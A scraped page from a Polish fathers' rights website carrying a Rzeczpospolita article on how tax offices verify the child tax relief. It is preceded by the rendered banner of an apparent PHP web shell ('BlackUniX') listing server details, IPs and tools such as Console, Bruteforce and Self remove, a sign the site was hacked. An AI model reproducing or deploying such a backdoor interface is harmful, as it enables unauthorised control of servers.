W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:21:11
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Prawo do ulgi na dzieci trzeba udokumentować
21.06.2008.
Fiskus pierwszy raz kontroluje ulgę na dziecko. Rodzice wezwani do weryfikacji zeznania powinni się do tego przygotować. Dzięki temu unikną kolejnych wizyt w urzędzie. W rozliczeniach za ubiegły rok rodzice mogli zmniejszyć podatek o 1145,08 zł za każde wychowywane dziecko.
To nowe przepisy, dlatego urzędy skarbowe już sprawdzają, czy podatnicy właściwie je stosują. W pierwszej kolejności prawdopodobnie zostaną wezwane osoby, z których zeznania wynika wysoki zwrot podatku. Fiskus będzie się starał go zweryfikować, zanim przekaże pieniądze.

Legitymacja lub indeks

Dla urzędów skarbowych takie kontrole to nic nowego.– Podatnik będzie musiał przedstawić takie same dokumenty jak przy kontroli preferencyjnego opodatkowania z dzieckiem. Gdy chodzi o dzieci pełnoletnie, konieczny jest aktualny dokument poświadczający, że uczęszczają do szkoł – legitymacja szkolna lub studencka, indeks z aktualnymi wpisami czy zaświadczenie ze szkoły. Jeśli dziecko nie ukończyło 18 lat, wystarczy akt urodzenia – mówi Magdalena Kobos z Izby Skarbowej w Krakowie.

Podatnikom może się wydawać, że nie ma po co gromadzić dokumentów. Najczęściej tak rzeczywiście jest, ale nie zawsze. Urzędy mają bowiem pięć lat na weryfikację zeznań. Czasem lepiej zawczasu się do tego przygotować, gdy np. dziecko studiuje na drugim krańcu Polski. Dziś może bez problemu poprosić o zaświadczenie przy okazji wizyty w dziekanacie. Za kilka lat może to być dużo trudniejsze. Obecny student może przecież mieszkać już zupełnie gdzie indziej, niekoniecznie w Polsce.

Co sprawdzi urząd

Na co urzędnicy zwrócą największą uwagę? Z problemami muszą się liczyć przede wszystkim rodzice, którzy odliczyli ulgę, choć ich dziecko studiuje za granicą. Niefortunny sposób sformułowania ustawy o PIT pozbawił ich bowiem prawa do zmniejszenia podatku. Przysługuje ono, gdy dziecko uczy się szkole lub na uczelni wymienionej w przepisach o systemie oświaty lub prawie o szkolnictwie wyższym. Można mieć poważne wątpliwości, czy zasady te są zgodne z prawem wspólnotowym, ale ten argument raczej nie przekona urzędu skarbowego. Daje jednak podstawy do dochodzenia swoich praw przed sądem. Na szczęście, gdy dziecko jest studentem polskiej uczelni, ale przez pewien czas uczy się za granicą w ramach wymiany studentów, podatek można zmniejszyć.

Z dokładniejszymi kontrolami muszą się także liczyć rozwiedzeni rodzice. Oni bowiem muszą się podzielić limitem odliczenia. Urzędy zapewne będą chciały sprawdzić, czy razem nie odliczyli więcej niż 1145,08 zł za dziecko. Ponadto w takiej sytuacji przepisy uzależniają odliczenie od tego, czy dziecko przebywało z rodzicem. Niejasne regulacje mogą wywołać wiele sporów na tym tle między podatnikami a urzędami skarbowymi.Podatnicy muszą także być przygotowani na to, że urząd sprawdzi, czy pełnoletnie dziecko nie osiągnęło dochodów, które pozbawiałyby rodzica ulgi. Co do zasady jest to kwota 3015 zł. To akurat będzie łatwe, bo urzędy posiadają przecież informacje o dochodach dzieci.
Źródło : Rzeczpospolita Konrad Piłat
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.